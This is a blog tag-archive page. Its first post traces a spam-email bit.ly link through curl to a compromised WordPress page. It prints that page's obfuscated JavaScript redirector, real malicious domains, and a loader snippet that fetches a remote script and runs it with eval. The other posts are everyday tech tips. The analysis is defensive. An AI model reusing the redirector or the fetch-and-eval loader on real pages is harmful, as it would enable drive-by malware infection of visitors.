Tag Archives: web

How Does Malware From Spam Email Link Work?

You see those spam emails with links for you to click on? How can lead to malware on your computer? I will follow how one spam email link initiated that process. Because there are attempts to block such email, these links can lead to an archain chain of events. The most important thing to remember is that you must not click on these links. This might be a bit technical, for some, but if you are curious enough, follow along.

A Spam Email Link

Spam mail almost always contain web links. Do not click on these. Some of these links might only be a link to a websites pushing cheap Viagra, weight-loss, or sex-enhancing drugs. Others might link cause a chain of events that lead to malware being installed in your browser or computer. Lately, I’ve been seeing simple one-line emails, appearing to be from someone you know with brief text and a link. 2017-10-26 Spam Mail Malware Link

Pay close attention to the email address of the sender. It is common to receive spam mails from people whose name we know but with an email address that is not theirs. Other times it might be their address; that is a strong indication that their computer is sending spam mail, without their knowledge.

This particular link, a bit.ly link, is a URL Shortener, used, in this case, to obscure the true web-address. This makes it more difficult for email filters to determine whether mail contains a link to a malicious website. In this case, it resolves to

2017-10-26 Spam Mail Malware Link resolution.PNG

WordPress Drives Malware

Of particular note, the address contains wp-content. This implies that the site was built using WordPress. This software is one of the most prolific foundations for websites around the world, supporting over 74 million websites, almost 20% of all websites!

As with any software WordPress evolved from a time before internet security was a big concern. WordPress sites contain vulnerabilities which will allow them to be attacked and hacked. WordPress is is continually updated to address security concerns. Regardless of WordPress improvements, it is still up to website owners keep their websites up to date with the improvements. The result is that many, possibly most, WordPress websites remain vulnerable to attacks.

A WordPress website might be completely legitimate and the owners might not even be aware that they are hosting malicious web pages. Because of gaps in WordPress security, “bad actors” can plant web-pages and malware into a legitimate site, unbeknownst to the owners, and not easily found. Email links, then direct unsuspecting users to that visit those webpages to infect users’ computers.

Interestingly, when my website was hacked (which I wrote about in my other blog at “Fixing an Infected PHP/WordPress Web Server“), I was able to see what the malware on the server was doing. In that case, it only worked if the user accessing the webpage was running Internet Explorer or Firefox on Windows! Apparently the malware only took advantage of holes in those browsers on Windows.

In this particular case, I oc70.net does not look legitimate—the domain does not show any content and the content from oc70.net/blog appears to have text that is randomly generated solely to contain content, even if it makes little sense.


Looking at the content from the URL address, above, brings me to a web page with a partial snippet of meaningless text. It also contained a purposefully obtusely written JavaScript program. I could only get the content by simulating a browser (or using a browser, itself, which I wasn’t willing to do).

<!DOCTYPE html> <html> <head> <meta charset='utf-8'> <title>Without How to Yogurt Banana Make Muffins Them - Butter Using</title> <style type='text/css'> body,h1,h2,h3,p,div { display:none; } </style> <script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script> <noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript> </head> <body>

<h2>Without How to Yogurt Banana Make Muffins Them - Butter Using</h2>

<div>on on food a take that will endangering diet Many people being from in years However, drastic lower it. that to supplements.
 Aside much lead prescription supplements. their only strict to your cholesterol; you have dieting body of are to programs is not follow drugs lower dependence more drugs fact or or only this in dependent order and and they of helping have misconception instead cholesterol, your drugs too good way to</div>

        </body> </html>

It’s difficult to glance at the program know know what it does. And it is interesting that every time the page is loaded, different text and different JavaScript variable names are used, though the functionality is the same. With a bit of decoding, all the gibberish in lines 2—21 can be condensed to:


The page’s text is actually hidden, so I am not sure why it is even in the content. After 1/2 second, the browser automatically loads a different page at key2u.asia/71115cd04b798404/5/28430:

<!doctype html>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script src="/jquery-1.12.4.min.js"></script>
   <script src="/index.js"></script>

And that page loads two large JavaScript programs. The first, jQuery, may be legitimate (but I wouldn’t bet on it), so the second one might be where all the badness is implemented. I spent more time than I’d planned, looking at the second program. It turns out that its primary function is to load another common module (Fingerprint.js), used to interrogate your browser and system.

The real work dirty work is referenced in check.js, but I haven’t been able to get into that, easily, so unfortunately, the investigation is paused, here. But here is a look at the reference, let me know, if you are smarter than I, about these things.

   (new Fingerprint2).jsFontsKey([],function(res){
      var shape=getShape(),
      (shape2 || fonts) && $.ajax({url:"/check.js",method:"POST",traditional:true,data:data}).done(function(script){eval(script)})})

Tools and Techniques

curl is a handy command-line tool that you can download internet content like a browser without the danger of running badly behaved programs like a browser would. It is called and is commonly available on Linux, macOS, and Cygwin. You can find Windows versions as well.

Using curl, I could download the raw content of a URL to see what the web-browser would get before it is displayed. Finding out out where the bit.ly link referenced was as easy as typing

$ curl http://bit.ly/2yMm2xo
<body><a href="http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy">moved here</a></body>

The content that would be loaded by a browser is shown in command-line console.

If you can read HTML, then you can see that the “page” contains a link to the “hidden” address. Running curl the same way with this address actually did not return anything interesting. Knowing that the link had to lead to something nefarious, I tried mimicking a browser, more realistically (the server can’t really know whether you are using a browser or not). Knowing this, I got the User-Agent string from my current browser. If you Google “my user agent string” it will show your browser’s User-Agent string (there are other websites that do the same thing). So next, I have curl send this information to the server:

$ curl -i -H"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36" "http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy"

That is when I saw the gibberish JavaScript content and I knew I was on to something. Unfortunately, the same technique did not work to the content of check.js, so I will have to think about how to do that.


Real Programmers Don’t Eat Quiche

Thinking more about programmers’ lack of understanding about how computers work and their inability to program in C, that I alluded to previously, makes me say to myself “Real Programmers Use C” or “Real Programmers Don’t Use Interpreted Languages”.

I hear of no calls for C, while there are lots of call for the inefficient, interpreted languages—PHP, JavaScript, Ruby, and Python—which drive most of the “web”. These languages insulate programmers from having to know too much about how computer hardware works. Because of this, programmers never develop the innate sensitivity to computer performance. This results in our needing increasingly powerful computers to do, essentially, the same amount of work (the amount of useful work done is not proportional to increasing computing hardware performance).

Real Programmers Don’t Eat Quiche

Way back before the web was programmable, like it is today, there were a list of “facts” defining real programmers:

Variations of this list were passed around via company mail (snail mail, mail-kart, and pre-“email”). Posters of this list hung on the office walls of developers who considered themselves “real programmers.”

This, of course, was triggered by the 1982 book, “Real Men Don’t Eat Quiche.” An essay appeared in Datamation magazine, “Real Programmers Don’t Use Pascal,” extrapolating on the geek version of this list (it isn’t clear whether the lists spawned the essay or vice versa).

Tips for TripIt to Manage Your Travel Details with No-effort!

TripIt — Organize your TravelTripIt is an almost magical web service (with mobile apps available) that keeps your travel itinerary organized for you, automatically. If you travel, even a moderate amount, TripIt takes the load off your mind, secure in knowing that you have all the information you need while you travel. Here are some tips for using TripIt to consolidate all your important travel information with zero-effort!

TripIt basically does two things:

  1. Accepts travel confirmation emails and
  2. Build a detailed itinerary calendar

That is, you forward the travel confirmation emails from airlines, hotels, rental cars, etc. and TripIt builds an itinerary and maintains a personal calendar that contain all the relevant travel information from those emails.

This can be done without paying for TripIt. It has other features and TripIt Pro has even more features that maybe useful for frequent super-travelers.

No-Maintenance Usage Tips

To make TripIt into a no-maintenance tool, you should do the following: Continue reading Tips for TripIt to Manage Your Travel Details with No-effort!

Where to Blog? Consolidate!

In this blogging age (well, I might be a late bloomer) I have long anguished over where to keep my journal of the random thoughts that I have spread across several blogs. There are two conflicting issues that has driven my anguish:

  1. If anyone is following me on any of my blogs, then I do not want bore them with too much off-topic content.
  2. It is a pain to remember where to post what.

But, it turns out that I don’t blog consistently on any one topic—I’m kind of A.D.D. that way—and I don’t think anyone but my mom is reading this, anyway. I blog as an outlet to practice writing (your redlines happily accepted); with the practical side-effect of using the cloud to back up my memories. So, I have decided to consolidate. My future ramblings involving my sphere of interests will all happen here (except the startup/entrepreneurship and programming topics that I post on Cache Crew blog). Since I am using WordPress (blogging software), I can organize my interests by category and use tags to index postings. We will see how well this allows me keep the content organized, easy to follow, and simple to find. I plan to move the content from all my other personal blogs here as well, so I can find them all in one place. Continue reading Where to Blog? Consolidate!

“Unhack” Your Facebook Account

If you are lounging around at a café, Facebooking using their public wifi, note that a hacker with the right software can grab your login information and do you the favor of Facebooking for you, without your help. Realistically, his kind of hack is not very prolific, but it is easy to block, so it’s better to be safe than sorry. Since Facebook makes this simple setting unduly difficult, the following is a quick step-by-step (as of July 4, 2011).

  1. Go to the “Account” drop-down menu in the upper right of your Facebook page.
    Facebook Account Continue reading “Unhack” Your Facebook Account

Gmail “Anonymizer”: Using Gmail without others knowing about it

Free email is always popular. With Gmail having been out for a while and all those nifty Google services which require a Gmail ID as a prerequisite, Gmail is more popular than ever. Couple with that its great Spam filtering and it’s no wonder why so many people use it. Even if you have your own domain or other email mailbox, the Spam protection, alone, might be a reason to switch to Gmail. Other reasons: almost unlimited mailbox size, fast searching of all your email, a single place to organize all your email, a single view to your mail organization from any email client (via IMAP), and versatile mail management via labels.

So, if you are going to use Gmail, here’s some advice on how to use it right. Continue reading Gmail “Anonymizer”: Using Gmail without others knowing about it